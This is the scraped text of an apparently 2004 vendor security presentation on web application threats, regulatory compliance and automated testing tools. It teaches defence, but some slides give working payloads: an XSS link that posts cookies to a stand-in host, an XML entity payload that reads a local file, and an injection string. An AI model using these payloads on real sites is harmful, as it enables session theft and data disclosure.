ISSA Delaware Valley Chapter Meeting Achieving Enterprise Security through Collaboration Steve Orrin...
-
date post
19-Dec-2015 -
Category
Documents
-
view
220 -
download
2
Transcript of ISSA Delaware Valley Chapter Meeting Achieving Enterprise Security through Collaboration Steve Orrin...
ISSA Delaware Valley Chapter MeetingISSA Delaware Valley Chapter MeetingAchieving Enterprise SecurityAchieving Enterprise Security through through
CollaborationCollaboration
Steve OrrinCTO
Sanctum Inc.
Recent News
Man admits hacking
into NY Times
-MSNBC
Jan 8, 2004
Hackers attack eBay
accounts— ZDNet NewsMar 25,2002
CA State Agency warns of
Security Breach
— CNET News, Feb 13, 2004Sites Revealed Passwords
For Thousands Of
Ameritech Users —
NewsBytes Feb 22,2002
US Port hit by UK Hacker
— BBC, Oct 6,2003
FBI investigates hack at
e-voting software
company - News.com, Dec 30, 2003
Glitch at Fidelity Canada
exposes customer information
— ComputerWorld, May 30, 2002
Hacker Accesses
2.2 Million Credit
Cards - CNN, Feb 18,2003
Hacker steals 13,000
credit card numbers from US
Navy• Washington Post, Aug 23,
2003
NASA Sites Hacked— ComputerWorld, Dec 17, 2003
Hackers get Acxion Customer Information — ComputerWorld Aug 9, 2003
FTD.com hole leaks
personal information
— CNet, Feb 13, 2003
FTC investigates PetCo.com security holes — SecurityFocus, Dec
5, 2003
Impact of Security Defects
Bad Business Bad Business
• On average, there are 5 to 15 defects in every 1,000 lines of code
US Dept. of Defense and the Software Engineering Institute
Slow Business Slow Business
• It takes 75 minutes on average to track down one defect. Fixing one of these defects takes 2 to 9 hours each
5 Year Pentagon Study
• Researching each of the 4,200 vulnerabilities published by CERT last year for 10 minutes would have required 1 staffer to research for 17.5 full workweeks or 700 hours
Intel White paper, CERT, ICSA Labs
Loss of BusinessLoss of Business
• A company with 1,000 servers can spend $300,000 to test & deploy a patch; most companies deploy several patches a week
Gartner Group
Pressures on the Application Lifecycle Increasing
Time-to-Market• Bringing new applications to market quickly
Complexity is Growing
• Increased application lifecycle complexity
Increasing Business Risks Driven by Security Defects
• Rise in Hacker activity
• Government scrutiny and regulation pressures (HIPAA, GLBA, SB1386, etc..)
• Liability precedents for security defects
Costs Escalate Dramatically the longer you wait to Find and Fix
• Bad software costs the economy $59.5 billion a year- cost of breakdowns and repairs (Nat. Institute of Standards & Technology, May 2002)
3. Audit
2. Test
1. Develop
4. Operate
Why Application Security Defects Matter
Frequent
• 3 out of 4 business websites are vulnerable to attack (Gartner)
Pervasive
• 75% of hacks occur at the Application level (Gartner)
Undetected
• QA testing tools not designed to detect security defects in applications
• Manual patching - reactive, never ending, time consuming & expensive
Dangerous
• When exploited, security defects destroy company value and customer trust
>2000 application ‘Healthchecks’ with AppScan – 98% vulnerable: all had firewalls and encryption solutions in place…
32% Hijack Session/
Identity Theft
11% e-Shoplifting
21% Full Control and Access to
Information
2% Delete Web Site
27% Privacy Breach
7% Modify Information
Business Impact of Application Hacks
Through a browser, a hacker can use even the smallest bug or backdoor to accomplish identity theft, fraud, denial of service and to obtain and manipulate
Customer and Consultants records
Misdirect customers to bogus site
Change parameters ie.total contribution>100%
Application Threat Negative Impact Example Business Impact
Buffer overflow Denial of Service (DoS) Site Unavailable to Customers
Cookie poisoning Session Hijacking Cash out someone else’s account
Hidden fields Alter site, Illegal transactions Change hidden fields ie. Account Balance
Debug options Admin Access Access to all accounts and information
Cross Site scripting Identity Theft Allows intruder transfer of funds
Stealth Commanding Access O/S and Application Get list of customer accounts
Parameter Tampering Fraud, Data Theft Alter distributions and transfer accounts
Forceful Browsing/
SQL Injection
Unauthorized Site/Data Access Administrative privileges to database with read/write access
3rd Party Misconfiguration Admin Access Create new unauthorized database of customers
Published Vulnerabilities Admin Access, DoS Create new unauthorized account
Legislation: Validation and Reporting Required
• GLBAGLBA:: mandatory privacy and security standards in financial services industry (and enforced by the FTC)
• HIPAA:HIPAA: mandatory privacy and security standards in healthcare industry
• FERC:FERC: mandatory privacy and security standards in energy industry
• SB1386:SB1386: Calif law requires companies to warn consumers when personal information may have been stolen
• Sarbanes-Oxley: Sarbanes-Oxley: mandatory auditing controls requiring CEO/CFO to certify adequate “internal control” safeguards are in place
• Putnam Bill (still in debate)Putnam Bill (still in debate) – mandatory security audits
Identity Theft complaints come to the FTC at Identity Theft complaints come to the FTC at more than 13,000/monthmore than 13,000/month
RegulationFinancial Services Insurance Banking Healthcare Pharmaceutical Gov’t
Sarbanes-Oxley Act of 2002
HIPAA
California SB 1386
USA Patriot Act
Gramm-Leach Bliley Act
Government and Industry Regulations Impact Matrix on Internet Security
Source: IDC, 2003 (modified)
Yellow = Minor Impact, Orange = Medium Impact, Red = Major Impact
Example: Cross Site Scripting
• Vulnerability explanationVulnerability explanation:
Extremely common: A flaw in server’s web page leads to compromise in a client
A third party creates a link (or sends an email) and the URL contains a parameter with a script – once the user connects, the site runs this script
• Why Cross Site ScriptingWhy Cross Site Scripting:Many parameters are implanted within the HTML of following responses, while not checking their content for scripts
• As a result of this manipulationAs a result of this manipulation:“Virtual hijacking” of the session. Any information flowing between the legitimate
user and site can be manipulated or transmitted to the evil 3rd party. The fault is simply echoing user input! (Trusting user input!!)
CSS In Action
<a href= http://www.insecuresite.com/welcome.asp?name= <FORM action=http://www.badsite.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>>here</a>
XML/Web Services Attack Vectors
• Old Attacks still validOld Attacks still valid– CWV’s– Injection Attacks– Buffer Overflow– Denial of Service
• The New Manipulation AttacksThe New Manipulation Attacks– Entity and Referral Attacks– DTD and Schema Attacks
• The Next Generation AttacksThe Next Generation Attacks– Web Service Enabled Application Attacks– Multi-Phase Attacks
Command Injection SOAP Attacks
SQL Injection in
XQuery
Cross-Site Scripting in
Client Side XML
Documents
SAP/BAPI attacks via
SOAP
Entity Expansion Attacks
Endless loop Denial of
service Attacks
Schema Redirection Attacks
XPATH Injection
XML Attack Example (Entity Expansion)
An attack on XXX Application ServerAn attack on XXX Application Server1. Find a web service which echoes
back user data such as the parameter "in"
2. Use the following SOAP request
3. And you'll get
C:\WinNT\Win.ini in the response (!!!)
How it works:How it works:A. XXX App Server expands the entity “foo” into full text, gotten from
the entity definition URL - the actual attack takes place at this phase (by XXX Application Server itself)
B. XXX App Server feeds input to the web service
C. The web service echoes back the data
...<!DOCTYPE root [
<!ENTITY foo SYSTEM "file:///c:/winnt/win.ini">]>...<in>&foo;</in>
Next Generation Attacks:XPath Injection
• Query based injection attack targeting Web applications using XML data sources (XML documents and XML Databases)
• Why XPath Injection?
– Traditional Query Injection: ' or 1=1 or ''='
– XPath Blindfolded Injection
• Attacker extracts information per a single query injection. The novelty is:
– No prior knowledge of XPath query format required (unlike “traditional” SQL Injection attacks).
– Whole XML document eventually extracted, regardless of XPath query format used by application
• Defending against XPath injection (similar to defending against SQL injection)
• The application must sanitize/validate user input
• Use an application firewall in front of the web site
Next Generation Attacks:HTTP Response Splitting
• A new carrier affecting Web Server communications to perform old A new carrier affecting Web Server communications to perform old attacks in a more elegant and malicious way….attacks in a more elegant and malicious way….
• Hackers can easily and with greater immunity perform the following Hackers can easily and with greater immunity perform the following attacks:attacks:– Web Cache Poisoning (new type of attack)
• poisoning the reverse proxy cache – defacement
• poisoning an intermediate cache server – next generation phishing
• poisoning a browser cache – targeted attack
– Hijacking a page (HTTP response) with user sensitive information • Diverts a response intended for a client, to the attacker
– Cross-site scripting (XSS)• New way to implement XSS with above mentioned added ‘benefits’
Anti-Forensics Properties:A step toward the "perfect hack" !
• Easily reversible - manually by attacker and as part of normal Easily reversible - manually by attacker and as part of normal cache operationscache operations– The nature of the attack hampers incident response activities– Allows for removal of evidence– Allows the attacker to more easily cloak the evidence of attack– Web Caching is rarely logged
• End result: a novice cracker can hack with a level of impunity End result: a novice cracker can hack with a level of impunity once reserved for the very skilledonce reserved for the very skilled
How it works
• Normal Request – Response scenario• User sends request to a Web server/application & Web server /
application process request and sends response
• Attack scenario 1: Attack request (normal request with embedded attack) with 2 responses
• Attacker sends attack request to a web server/application• Web server/application process request• When Web server interprets response from application the attack
‘tricks’ the Web server into breaking the response and sends a second request (the embedded attack request)
• The attack request is sent to user/cache
• Root cause • Poor user input validation
The Heart of the Issue: Input Trust
• “All input is evil, until proven otherwise!”– The root of most serious vulnerabilities
• Buffer Overruns• Canonicalization issues• Cross-site Scripting (XSS) attacks• SQL Injection attacks • Integer overflow attacks
• Good guys give you well-formed data, bad guys don’t!
• Don’t rely on your client application providing clean data– Don’t assume attackers play by the rules– They go ‘under the radar’
Input Remedies
• Require authenticated connections
• Sanitize all input from untrusted sources– Look for valid data– Reject everything else– High-level languages can use RegExp
• SSN = ^\d{3}-\d{2}-\d{4}$
• Make no assumptions about the trustworthiness of data
• Never directly echo Web-based user input– Verify input, then echo it– At the very least, HTML or URL encode the output
Introducing Risk Early: The Vicious Cycle
Design, Develop, & TestDesign, Develop, & TestStagingStaging
Deployment & OperationsDeployment & Operations
ProductionProduction
Responsibilities– Develop high quality secure apps
Tools– IDEs – Performance & functionality QA tools– Manual test scripts and code review– Freeware
Challenges– Don’t have the tools, time or training for security testing
Result– Dangerous security defects passed downstream to operations– Code comes back to development to work on again……
Responsibilities– Audit apps before/after deployment– Patch & fix – Communicate to development
Tools– Network Scanners – Vulnerability Assessment Tools
Challenges– Ran out of time! – Being measured on deployment – not sending back to development
Results– Kept waiting for quality software to deploy– Anxious about overall software quality deployed – the next attack….
Development is fertile ground for security bugs…
Ops, Admins, & Auditors are expensive exterminators…
Automated Security Testing for the Application Lifecycle
Develop (Developer): • Construct application• Unit test application components
Test (Tester/ QA Engineer): • Create test plan• Create, run & manage test scripts• Defect assignment & tracking • Delta, trend and results analysis• Approve release to production
Audit (Ops & Security Auditor): • Create operations plan• Deploy & maintain business compliance• Scheduled (or not!) application audits
AuditAudit
TestTest
DevelopDevelop
Financial Impact
Cost to Fix dramatically increases Cost to Fix dramatically increases the longer you wait to testthe longer you wait to test
100
50
25
75
Percent of Applications
Cost of Backlog:Statistics from 10 F100 Companies
half of 20% never pass
3 half of 20% pass
1
92% of applications fail security testing
8% pass
2
80% pass
20% fail
= 2.5 month avg. delay > $25M in lost savings/revenue
The Bottom Line
Costs of defects introduced early in lifecycle quickly add-up
• Untested applications in production
• Longer development cycles
• More development cycles
• Considerable business risks
Understand, Communicate, Measure
• UnderstandUnderstand your exposure your exposure
• Use tools that scan for exposure points at the web server and application layers as part of application development process
• The data collected must be relevant to the audience receiving it
• The importance of terminology and types of data provided
• CommunicateCommunicate your the exposures (security defects) your the exposures (security defects)
• Various stake holders in the development lifecycle need different types of data
• Use the tracking tools already in place
• Map security defects to business needs
• Measure Measure your assessment process / security defect your assessment process / security defect remediationremediation
• Analyze exposure from individual assessments and compare results across the cycle
From Vicious to Virtuous Development Cycle
Give developers, QA and administrators the tools and training they need to succeed!
The Result: Address Compliance
Application Threat Impacts GLBA / HIPAA
GLBA/HIPAA Mandate Security Testing
Addresses
Buffer overflow
Cookie poisoning
Hidden fields
Debug options
Cross Site scripting
Stealth Commanding
Parameter Tampering
Forceful Browsing/
SQL Injection
3rd Party Misconfiguration
Published Vulnerabilities
• Ensure the security & confidentiality of customer records and information
• Protect against any unanticipated threat or hazard to the security or integrity of these records
• Protect against unauthorized access that could result in substantial harm or inconvenience to customer
Network devices do not detect these vulnerabilities
The Result:Address Compliance
Application Threat Impacts SB 1386
SB 1386 Mandate Security Testing
Addresses
Buffer overflow
Cookie poisoning
Hidden fields
Debug options
Cross Site scripting
Stealth Commanding
Parameter Tampering
Forceful Browsing/
SQL Injection
3rd Party Misconfiguration
Published Vulnerabilities
• Prevent unauthorized access to California customers or employee personal information
• Penalty of breach: each customer/employee must be individually notified in writing of breach in confidentiality in less than two weeks.
•Otherwise, a public announcement to the press must occur
Automated Web Application Testing and Risk Assessment
S.A.F.E.:S.A.F.E.: Speed, Accuracy, Flexibility and Efficiency Speed, Accuracy, Flexibility and Efficiency
Site SmartSite Smart for QA and Audit: for QA and Audit:• Seamlessly integrates into any QA or Audit environment• Tests both new and existing Internet infrastructures• Ensures Compliance of security best practices and external regulations
Application Lifecycle Security: Application Lifecycle Security: Accelerates ROIAccelerates ROI • increased revenue • increased customer satisfaction • decreased customer acquisition and retention costs
Application Lifecycle Security to increase the Speed and Ease of Application Deployment in a Secure Environment
Application Security Across the Lifecycle
• Incorporate security into the process – early on and at each stage• Document and report – demonstrate compliance• Improve overall result• Reduce costs
1. Develop 2. Test 3. Audit 4. Operate
AppScan DE AppScan QAAppScan
Audit AppShield
RELIABILITYRELIABILITY ASSURANCEASSURANCE VALIDATIONVALIDATION CONFIDENCECONFIDENCE
Create‘hacker resistant’
applications
Testapplication quality
Audit for security and
compliance
Maintainapplication integrity
and userconfidence